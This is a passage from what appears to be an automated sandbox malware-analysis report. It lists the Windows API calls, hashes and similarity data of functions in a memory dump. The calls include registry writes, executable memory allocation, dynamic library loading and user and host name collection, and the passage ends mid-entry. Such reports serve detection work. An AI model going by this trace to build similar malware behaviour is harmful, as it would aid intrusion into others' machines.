lstrlenW.KERNEL32(?,00000000,00B80000,00B799D3), ref: 00B5A94A
lstrlenW.KERNEL32(?,00000000,00B80000,00B799D3), ref: 00B5A95C
lstrlenW.KERNEL32(?,00000000,00B80000,00B799D3), ref: 00B5A96E
lstrlenW.KERNEL32(?,00000000,00B80000,00B799D3), ref: 00B5A980
lstrlenW.KERNEL32(?,00000000,00B80000,00B799D3), ref: 00B5A98C

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 11ce929e039f74de92379d7e74e8cbb25efb8fc95f8557367a12d8cde66a3958
Instruction ID: 2ffe083ddff4b3fa9c5cc968df66f6958a9f40503ad92967bddf7e8a135f5dd8
Opcode Fuzzy Hash: 11ce929e039f74de92379d7e74e8cbb25efb8fc95f8557367a12d8cde66a3958
Instruction Fuzzy Hash: 24413171E0021AAFCB10DF99C880BAEB7F9FF98305B1589E9E955F3200D774E9498B51

Uniqueness

Uniqueness Score: -1.00%

Function 00B521AA, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5975C: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 00B59768
Part of subcall function 00B5975C: SetLastError.KERNEL32(000000B7,?,00B521BE), ref: 00B59779

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B521DE
CloseHandle.KERNEL32(00000000), ref: 00B522B6

Part of subcall function 00B69F4D: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B69F67
Part of subcall function 00B69F4D: CreateWaitableTimerA.KERNEL32(00B81248,00000003,?), ref: 00B69F84
Part of subcall function 00B69F4D: GetLastError.KERNEL32(?,?,00B52212,?), ref: 00B69F95
Part of subcall function 00B69F4D: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00B52212,?,?,?,00B52212,?), ref: 00B69FD5
Part of subcall function 00B69F4D: SetWaitableTimer.KERNEL32(?,00B52212,00000000,00000000,00000000,00000000,?,?,00B52212,?), ref: 00B69FF4
Part of subcall function 00B69F4D: HeapFree.KERNEL32(00000000,00B52212,00000000,00B52212,?,?,?,00B52212,?), ref: 00B6A00A

GetLastError.KERNEL32(?), ref: 00B5229F
ReleaseMutex.KERNEL32(00000000), ref: 00B522A8

Part of subcall function 00B5975C: CreateMutexA.KERNEL32(00B81248,00000000,?,?,00B521BE), ref: 00B5978C

GetLastError.KERNEL32 ref: 00B522C3

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: f40e815d4c40f38424fcef0d216014b761df83d5d1cee0ebb0406740704b3dd2
Instruction ID: 2081259d2a7649f8e807fe0d9702d450b2eb5fc05002ac1695f74f5da30ce130
Opcode Fuzzy Hash: f40e815d4c40f38424fcef0d216014b761df83d5d1cee0ebb0406740704b3dd2
Instruction Fuzzy Hash: DB318379A012049FCB01AF78DC89E6A7BF9FB8A711B2408E5F816E7361DB319845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B75EF4, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 00B75F0D

Part of subcall function 00B58AB5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,74E04DE0,00000000), ref: 00B58ADB

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00B75BA6,00000000), ref: 00B75F4F
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00B75FA1
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,00B75BA6,00000000), ref: 00B75FBA

Part of subcall function 00B64857: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B64878
Part of subcall function 00B64857: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,00B75F40,00000000,00000000,00000000,00000001,?,00000000), ref: 00B648BB

GetLastError.KERNEL32(?,00000000,00B75BA6,00000000,?,?,?,?,?,?,?,00B577C7,?), ref: 00B75FF2

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: 1337bbb51dd31d9e574b39cab56e01af82cd72d839016626301d8c7146bf63f2
Instruction ID: 0a31d4cf8b6c1519d2fdc3bddae46b93bd5332c6adeb08cc253f4d793f2e2f40
Opcode Fuzzy Hash: 1337bbb51dd31d9e574b39cab56e01af82cd72d839016626301d8c7146bf63f2
Instruction Fuzzy Hash: F2315D71A00609AFDB21DF94CC95EAE7BF9EF08350F0080A5FA19EB260DB719944DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B5E438, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 00B5E4BA
lstrcpy.KERNEL32(00000000,?), ref: 00B5E4D3
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 00B5E4E0
lstrlen.KERNEL32(00B823A8,?,?,?,?,?,00000000,00000000,?), ref: 00B5E4F2
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 00B5E523

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: 9dccd65845706c46d8b9d2ac00cee1dc3927c9b9f9c690d3191a3c207eeabfde
Instruction ID: 14004d3f8b8c76bd3e2222f0e4cfd493deaeefe840854f3e8a4edd63d69e9f5e
Opcode Fuzzy Hash: 9dccd65845706c46d8b9d2ac00cee1dc3927c9b9f9c690d3191a3c207eeabfde
Instruction Fuzzy Hash: 0F315C72900209AFDB15DF99EC48FAB7BB9EF44311F0084A4F92992220EB74DA55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5A422, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,00B5B065,00000000,74E5F5B0,00B6683A,?,?,?,?,?,?,?,00B577C7), ref: 00B5A442
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B5A457
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B5A473
GetProcAddress.KERNEL32(00000000,?), ref: 00B5A488
GetProcAddress.KERNEL32(00000000,?), ref: 00B5A49C

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: LibraryLoad$AddressProc
String ID:
API String ID: 1469910268-0
Opcode ID: 22f2d3b2e5970d174590cdc339bc8d9f9be3539a4109023cefb2f8554a4f537e
Instruction ID: 5a64938650db59a95f91d326ee687b16e481fa48d1fa3b610fdbabb941200f86
Opcode Fuzzy Hash: 22f2d3b2e5970d174590cdc339bc8d9f9be3539a4109023cefb2f8554a4f537e
Instruction Fuzzy Hash: C331473A6112008FC741EFACEC89F6533ECFB49750B414596EA08E7370DB70A94ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B556AA, Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00B556BE
GetComputerNameW.KERNEL32(00000000,?), ref: 00B556DA

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

GetUserNameW.ADVAPI32(?,?), ref: 00B55714
GetComputerNameW.KERNEL32(?,?), ref: 00B55737
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00B5575A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: d01f714c9c81b386ec8b5caa37c3f06a1bdf3a1090288e59c10d075f74e3952f
Instruction ID: 71db0b34a0a6cd29edf47d5bf2e8c289b732b8355bb1738c83493bf32fce0338
Opcode Fuzzy Hash: d01f714c9c81b386ec8b5caa37c3f06a1bdf3a1090288e59c10d075f74e3952f
Instruction Fuzzy Hash: 3121E976900208FBCB11DFA4D995DAEBBFCEE48345B1044AAE505E7210DB309F44DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B57E04, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6B2AA: lstrlen.KERNEL32(00000000,00000000,?,00000000,00B6F438,00000000,00000000,?,?,?,00B58FDB,?,?,00000000), ref: 00B6B2B6

RtlEnterCriticalSection.NTDLL(00B81488), ref: 00B57E2E
RtlLeaveCriticalSection.NTDLL(00B81488), ref: 00B57E41
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B57E52
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B57EBD
InterlockedIncrement.KERNEL32(00B8149C), ref: 00B57ED4

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 10c3680c2ced6e36b7b522c4cb2281b6870afe617458a60523fc9c82489164cf
Instruction ID: 4f0e1d2569ba51a765c780ff962870cd19b6c038a4d00ed06189e43cef1e5071
Opcode Fuzzy Hash: 10c3680c2ced6e36b7b522c4cb2281b6870afe617458a60523fc9c82489164cf
Instruction Fuzzy Hash: 46319F32A063069FC721DF68E845A2AB7EDFB44362F0949D9E85583621DB30DC56CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B5320A, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E56F
Part of subcall function 00B6E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF), ref: 00B6E588
Part of subcall function 00B6E55D: GetCurrentThreadId.KERNEL32 ref: 00B6E595
Part of subcall function 00B6E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,00B77545,00002334,?,?,?,?,00B512DF,?), ref: 00B6E5A1
Part of subcall function 00B6E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00B77545,00002334), ref: 00B6E5AF
Part of subcall function 00B6E55D: lstrcpy.KERNEL32(00000000), ref: 00B6E5D1

DeleteFileA.KERNEL32(00000000,000004D2), ref: 00B5322D
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00B53236
GetLastError.KERNEL32 ref: 00B53240
HeapFree.KERNEL32(00000000,00000000), ref: 00B532FF

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID:
API String ID: 3543646443-0
Opcode ID: b61d10b1169159cbfc6162cc6575e51fd6b8058cc62440573b9a6c75ca604acc
Instruction ID: 493617600c78f18f76728ddbdb2ab6f5e7e5e8d8e639ceced8c0e326956ca16f
Opcode Fuzzy Hash: b61d10b1169159cbfc6162cc6575e51fd6b8058cc62440573b9a6c75ca604acc
Instruction Fuzzy Hash: 94213B72542120ABC620E7E8EC4DF9A33DCDB4AB12B1504D1FB09DB272DB24D70ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B5A844, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6D448: GetSystemTimeAsFileTime.KERNEL32(00B6683A,?,00000000,00B6683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,00B5B059,00000000,74E5F5B0,00B6683A), ref: 00B6D454
Part of subcall function 00B6D448: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 00B6D46A
Part of subcall function 00B6D448: _snwprintf.NTDLL ref: 00B6D48F
Part of subcall function 00B6D448: CreateFileMappingW.KERNEL32(000000FF,00B81248,00000004,00000000,00001000,?), ref: 00B6D4AB
Part of subcall function 00B6D448: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 00B6D4BD
Part of subcall function 00B6D448: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 00B6D4F5

UnmapViewOfFile.KERNEL32(?,00B6683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,00B5B059,00000000,74E5F5B0,00B6683A), ref: 00B5A87F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B5A888
SetEvent.KERNEL32(?,00B6683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,00B5B059,00000000,74E5F5B0,00B6683A), ref: 00B5A8CF
GetLastError.KERNEL32(00B6B009,00000000,00000000,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B5A8FE
CloseHandle.KERNEL32(00000000,00B6B009,00000000,00000000,?,?,?,?,?,?,?,00B577C7,?), ref: 00B5A90E

Part of subcall function 00B5D44C: lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,00B5DB20,00000000,00000000,00B62461,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B5D458
Part of subcall function 00B5D44C: memcpy.NTDLL(00000000,00000000,00000000,00000106,?,?,00B5DB20,00000000,00000000,00B62461,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B5D480
Part of subcall function 00B5D44C: memset.NTDLL ref: 00B5D492

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: 1f4fe83110256c9e4f275d0af3694f04d13d5fa6e8f318b5f1eee13abe95c381
Instruction ID: 1dfc95a73618079bc865a31526fca8768765c52f0cf07fa899f87353093ca451
Opcode Fuzzy Hash: 1f4fe83110256c9e4f275d0af3694f04d13d5fa6e8f318b5f1eee13abe95c381
Instruction Fuzzy Hash: A9217931600209ABDB11AF69DC45F5A77ECEB00311B0409E8E906E3271EB30ED86CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5FE9E, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,00B5D4DC,00000000,?,?), ref: 00B5FEBC
GetFileSize.KERNEL32(00000000,00000000,?,?,00B5D4DC,00000000,?,?,?,00000000,-00000007,00B6F475,-00000007,?,00000000), ref: 00B5FECC
ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,00B5D4DC,00000000,?,?,?,00000000,-00000007,00B6F475), ref: 00B5FEF8
GetLastError.KERNEL32(?,?,00B5D4DC,00000000,?,?,?,00000000,-00000007,00B6F475,-00000007,?,00000000), ref: 00B5FF1D
CloseHandle.KERNEL32(000000FF,?,?,00B5D4DC,00000000,?,?,?,00000000,-00000007,00B6F475,-00000007,?,00000000), ref: 00B5FF2E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: b41ad9d4bb101b807c271fd6a3f58adb3fa2956085b68c89fd275ab7662b2eab
Instruction ID: 0be9ff6f3b78d9b8ec3fefabb9eb1c2de14c58c9dccf7d45b68f2c2bc00c845c
Opcode Fuzzy Hash: b41ad9d4bb101b807c271fd6a3f58adb3fa2956085b68c89fd275ab7662b2eab
Instruction Fuzzy Hash: 7B11C03250031AABDB206F64DC88FBEBBA9EB05362F0441F5FD29A7590D6309D848A60

Uniqueness

Uniqueness Score: -1.00%

Function 00B67DDE, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,037C65A8,00000000,00B75BA6,?,?,?,00B523F4,74E05520,?,00B76007,00000000,00000000), ref: 00B67E15
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,00B523F4,74E05520,?,00B76007,00000000,00000000,?,00000000,00B75BA6,00000000), ref: 00B67E45
RtlEnterCriticalSection.NTDLL(00B81460), ref: 00B67E54
RtlLeaveCriticalSection.NTDLL(00B81460), ref: 00B67E72
GetLastError.KERNEL32(?,00B523F4,74E05520,?,00B76007,00000000,00000000,?,00000000,00B75BA6,00000000), ref: 00B67E82

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: cceafb6066dfae4408dd27769e34d6af83032f714a79bf9943a7b0009252405c
Instruction ID: 83219fe1e657a3ac3de8c635d45cc6a9ea1181f8afe46a57be664bd36cea91e5
Opcode Fuzzy Hash: cceafb6066dfae4408dd27769e34d6af83032f714a79bf9943a7b0009252405c
Instruction Fuzzy Hash: 5921F8B5600B06EFD710DFA9C984A46B7F8FB08314B0085A9E66A97720DB74FD44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B67021, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 00B6704F
GetLastError.KERNEL32 ref: 00B67072
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B67085
GetLastError.KERNEL32 ref: 00B67090
HeapFree.KERNEL32(00000000,00000000), ref: 00B670D8

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: ddd8341d976fd74b57b09d101253e220be2705d9056083b90508148d8b757619
Instruction ID: 4f65ff26fd2d02379bc11b29266d0676ae9a91a0eb894012fe055f6f3628772f
Opcode Fuzzy Hash: ddd8341d976fd74b57b09d101253e220be2705d9056083b90508148d8b757619
Instruction Fuzzy Hash: EB218830144240ABEB209B64DD8CF5E7BFAEB00718F200898E112975B1CF7AADC4DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00B555C4, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00B555D8
memcpy.NTDLL(00000000,00B6E507,?,?,00000008,?,00B6E507,00000000,00000000,?), ref: 00B55601
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?), ref: 00B5562A
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000,00000008,?,00B6E507,00000000,00000000,?), ref: 00B5564A
RegCloseKey.ADVAPI32(?,?,00B6E507,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00B6CC72,00000000), ref: 00B55655

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: 89fd9971a10d21677f788c89469b9a7563b98594e90c8fc0aa2297616016b00c
Instruction ID: 25ee08d84f243ff645bbafd2730fb99e92f50e575cb13260b5aac617d0b70d42
Opcode Fuzzy Hash: 89fd9971a10d21677f788c89469b9a7563b98594e90c8fc0aa2297616016b00c
Instruction Fuzzy Hash: 84117076100149BBDB216F64ECA5FBB7BADEB44393F4040A6FE01E3161DA718D28DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E476, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00B6CC72,?,?,?,?,00000008,00B6CC72,00000000,?), ref: 00B6E493
memcpy.NTDLL(00B6CC72,?,00000009,?,?,?,?,00000008,00B6CC72,00000000,?), ref: 00B6E4B5
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00B6E4CD
lstrlenW.KERNEL32(00000000,00000001,00B6CC72,?,?,?,?,?,?,?,00000008,00B6CC72,00000000,?), ref: 00B6E4ED
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00B6CC72,00000000,?), ref: 00B6E512

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: b978c32059eb408f5cb91fd2fac5ab1544b9ec68014b6c57e13d136f81783903
Instruction ID: b0ce27d8622fb54d323ee6971adcb1bfd0a414335ccf32b16f54421eba013819
Opcode Fuzzy Hash: b978c32059eb408f5cb91fd2fac5ab1544b9ec68014b6c57e13d136f81783903
Instruction Fuzzy Hash: BE115179E01208BBCB219BA4EC09FCE7BBDEB08311F008491FA19E7291DB34D649DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C17C, Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(00000000,?), ref: 00B5C1AB
RtlEnterCriticalSection.NTDLL(00B81488), ref: 00B5C1B8
RtlLeaveCriticalSection.NTDLL(00B81488), ref: 00B5C1CB
lstrcmpi.KERNEL32(00B814A0,00000000), ref: 00B5C1EB
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B59162,00000000), ref: 00B5C1FF

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
String ID:
API String ID: 1266740956-0
Opcode ID: 8294e413ebfe98a7c2c2a36e43170238e8bc7dc5f51191530b5c16529dc1130f
Instruction ID: 514bd6ef71cdce378ce02e8ae6e9134cf88e5c1b518224e8accbd036693a3a89
Opcode Fuzzy Hash: 8294e413ebfe98a7c2c2a36e43170238e8bc7dc5f51191530b5c16529dc1130f
Instruction Fuzzy Hash: 4A11AF32901205AFCB04DB9DD848F9ABBEDFB04365F0944A5E819A3260DB34AD45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6EECA, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00000008,00B5B933,00000000,?,00000000,74E05520,00000000,?,00B56E27,?,?,?,00000000), ref: 00B6EED4

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

lstrcpy.KERNEL32(00000000,?), ref: 00B6EEF8
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,00000000,74E05520,00000000,?,00B56E27,?,?,?,00000000,?), ref: 00B6EEFF
lstrcpy.KERNEL32(00000000,?), ref: 00B6EF47
lstrcat.KERNEL32(00000000,?), ref: 00B6EF56

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: 22616f843d5200007c9b737d0aa6cdc4db3427332cd7f8547d8b3146fd9dfd68
Instruction ID: f62b67e8ffd1e1c4b2e19a13517d4b1c5b5e8a77424225f4a09c1bde0f49c3e6
Opcode Fuzzy Hash: 22616f843d5200007c9b737d0aa6cdc4db3427332cd7f8547d8b3146fd9dfd68
Instruction Fuzzy Hash: E911C67A1002069BE321DB69DC88F6B77ECEF94341F050569F619D3150DF38D949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B6B1DC, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6B2AA: lstrlen.KERNEL32(00000000,00000000,?,00000000,00B6F438,00000000,00000000,?,?,?,00B58FDB,?,?,00000000), ref: 00B6B2B6

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B6B205
memcpy.NTDLL(00000000,?,?), ref: 00B6B218
RtlEnterCriticalSection.NTDLL(00B81488), ref: 00B6B229
RtlLeaveCriticalSection.NTDLL(00B81488), ref: 00B6B23E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B6B276

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: d3e1d8fe80c783c3607bb4bbf4edeab7e14bb74e2666dada1a98ab1a9d507710
Instruction ID: a589f4fdf70653640ee454998050950d4859c20d18939a27086eaf94a2c209cd
Opcode Fuzzy Hash: d3e1d8fe80c783c3607bb4bbf4edeab7e14bb74e2666dada1a98ab1a9d507710
Instruction Fuzzy Hash: DD11C272102211AFC7116F28DC48D6F7BFDEB8632170949BAF91593231DB255C86CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B63E2B, Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 00B63E42

Part of subcall function 00B78AFB: wcstombs.NTDLL ref: 00B78BBB

lstrlen.KERNEL32(?,?,?,?,?,00B6620C,?,?), ref: 00B63E65
lstrlen.KERNEL32(?,?,?,?,00B6620C,?,?), ref: 00B63E6F
memcpy.NTDLL(?,?,00004000,?,?,00B6620C,?,?), ref: 00B63E80
HeapFree.KERNEL32(00000000,?,?,?,?,00B6620C,?,?), ref: 00B63EA2

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateFreememcpywcstombs
String ID:
API String ID: 1256246205-0
Opcode ID: de839d3608ee94dca7fdaf79e9bd4f3382b5bdb653df901c9ceeeaf61ecda49d
Instruction ID: 7214d214f830747092fea7f3c09f2f20c614d617b11b3c04b5f315c4ce9b4785
Opcode Fuzzy Hash: de839d3608ee94dca7fdaf79e9bd4f3382b5bdb653df901c9ceeeaf61ecda49d
Instruction Fuzzy Hash: 70115E75500604EFCB119B55DC84E5EBBF9EB95720F2080A5E909A3260DB36DE45DB30

Uniqueness

Uniqueness Score: -1.00%

Function 00B66C9D, Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6A406: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B5D4C8,?,00000000,-00000007,00B6F475,-00000007,?,00000000), ref: 00B6A415
Part of subcall function 00B6A406: mbstowcs.NTDLL ref: 00B6A431

lstrlenW.KERNEL32(00000000,74E5F560,00000000,?,00000000), ref: 00B66CC9
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B66CDB
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00B66CF8
lstrlenW.KERNEL32(00000000), ref: 00B66D04
HeapFree.KERNEL32(00000000,00000000), ref: 00B66D18

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID:
API String ID: 3403466626-0
Opcode ID: 28cfaf6fec8498ceccc8a4816bfd617d13dcdcdc77a08d9983c5db13d021c086
Instruction ID: 88c28bef9c57fe5e971c8e465e7ab01db2fb5c12db9a4deb381b833b1b83beb8
Opcode Fuzzy Hash: 28cfaf6fec8498ceccc8a4816bfd617d13dcdcdc77a08d9983c5db13d021c086
Instruction Fuzzy Hash: 55014C76101208AFD7119B98DC48F9E77EDEF49310F144065F60597271CFB49945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00B57C9C, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00B81460), ref: 00B57CA7
RtlLeaveCriticalSection.NTDLL(00B81460), ref: 00B57CB8
